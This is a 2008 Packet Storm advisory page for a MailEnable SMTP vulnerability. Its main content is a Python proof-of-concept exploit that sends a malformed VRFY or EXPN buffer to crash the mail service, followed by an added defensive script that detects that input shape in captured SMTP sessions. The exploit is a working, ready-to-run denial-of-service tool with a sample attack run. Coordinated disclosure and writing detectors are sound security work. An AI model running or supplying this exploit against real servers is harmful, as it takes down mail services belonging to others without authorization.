mailenable-dos.txt

Date: 13 Mar 2008 | Reported by: Matteo Memelli | Type: packetstorm | Source: packetstormsecurity.com

MailEnable SMTP Service VRFY/EXPN Command Buffer Overflow ( DoS ) exis

```python
#!/usr/bin/python
##########################################################################
#
# MailEnable SMTP Service VRFY/EXPN Command Buffer Overflow ( DoS )
# Bug discovered by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
#
# Affected Versions : Standard Edition all versions
#                     Professional Edition all versions
#                     Enterprise Edition all versions
# Tested on OS : Windows 2000 SP4 English
#                Windows 2003 Standard Edition Italian
#                Windows XP SP2 English
# Discovery Date : 02/24/2008
# Initial vendor notification : 03/06/2008
# Coordinated public disclosure: 03/11/2008
#
# CONGRATS TO THE MAILENABLE TEAM: VERY FAST IN PATCHING AND ANSWERING!!
#
#-------------------------------------------------------------------------
#
# THX TO muts at offensive-security.com :
# I'll promise you: next time i'll find an easier one and get my shell :P
#
#-------------------------------------------------------------------------
##########################################################################
#
# matte@badrobot:~$ ./mailenable_smtp.py -H 192.168.1.245 -P 25 -c VRFY
# [+] Connecting to 192.168.1.245 on port 25
# 220 test.local ESMTP MailEnable Service, Version: 0-3.13- ready at \
# 03/06/08 13:20:49
#
# [+] Sending evilbuffer...
# [+] Waiting 10 secs before reconnecting...
# [+] Reconnecting...
# [+] SMTP Server died!
# [+] Connection refused
#
##########################################################################

from socket import *
from optparse import OptionParser
import sys, time

usage = "%prog -H TARGET_HOST -P TARGET_PORT [-c COMMAND]"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
                  action="store", dest="HOST",
                  help="Target Host")
parser.add_option("-P", "--target_port", type="int",
                  action="store", dest="PORT",
                  help="Target Port")
parser.add_option("-c", "--command", type="string",
                  action="store", dest="COMMAND",
                  help="Command: VRFY or EXPN ; default VRFY")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
COMMAND = options.COMMAND
if not (HOST and PORT):
    parser.print_help()
    sys.exit()
if not COMMAND:
    COMMAND = 'VRFY'
    print "[+] Using default command VRFY"
else:
    COMMAND = COMMAND.upper().strip()
    if COMMAND != 'VRFY' and COMMAND != 'EXPN':
        print 'Invalid command "%s" Choose between VRFY or EXPN!' % COMMAND
        sys.exit()
evilbuf = '%s \nSMTPISGONNADIE\r\n' % COMMAND
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print "[+] Connecting to %s on port %d" % (HOST, PORT)
print s.recv(1024)
print "[+] Sending evilbuffer..."
s.send(evilbuf)
s.close()
print "[+] Waiting 10 secs before reconnecting..."
time.sleep(10)
try:
    s = socket(AF_INET, SOCK_STREAM)
    print "[+] Reconnecting..."
    s.connect((HOST, PORT))
except error, e:
    print "[+] SMTP Server died!"
    print "[+] %s" % e[1]
else:
    print "[-] SMTP Server is still up"
    print "[-] This probably means that is not vulnerable"
s.close()
```
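A defender-side check for the input shape the script above sends (the command, a space, a bare LF, then more text before the CRLF), added here as an example and not part of the original advisory or its author's code. It scans the client side of a captured SMTP session; the function name, the sample session and the choice to also flag an empty argument are assumptions made for this example.

```python
WATCHED = (b"VRFY", b"EXPN")  # the two commands the script above accepts

def inspect_client_stream(stream):
    """Return [(line_no, verb, [reasons])] for suspicious VRFY/EXPN lines.

    Lines are split on CRLF only, so a bare LF stays visible inside its
    line. Assumption: every DATA command is accepted by the server.
    """
    findings = []
    in_data = False
    lines = stream.split(b"\r\n")[:-1]  # drop the trailing partial line
    for number, line in enumerate(lines, start=1):
        if in_data:  # message body: skip until the lone "." terminator
            in_data = line != b"."
            continue
        verb = line[:4].upper()
        if verb == b"DATA" and len(line) == 4:
            in_data = True
            continue
        # Require a delimiter after the verb so "VRFYX" is not matched.
        if verb not in WATCHED or line[4:5] not in (b"", b" ", b"\t", b"\n"):
            continue
        reasons = []
        first, lf, _ = line.partition(b"\n")
        if lf:
            reasons.append("bare LF inside command line")
        if not first[4:].strip():
            reasons.append("empty argument")
        if reasons:
            findings.append((number, verb.decode("ascii"), reasons))
    return findings

# Constructed sample session (not captured traffic).
SAMPLE = (
    b"EHLO client.example\r\n"
    b"VRFY postmaster\r\n"               # normal lookup, not flagged
    b"expn \nfiller text\r\n"            # same shape as the script's buffer
    b"VRFY\r\n"                          # no argument at all
    b"DATA\r\n"
    b"VRFY \nquoted in a mail body\r\n"  # inside DATA, ignored
    b".\r\n"
    b"QUIT\r\n"
)

if __name__ == "__main__":
    for number, verb, reasons in inspect_client_stream(SAMPLE):
        print("line %d: %s: %s" % (number, verb, ", ".join(reasons)))
```

Splitting on CRLF alone is what keeps the embedded LF observable; a line-oriented log that has already normalised line endings will not show it.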
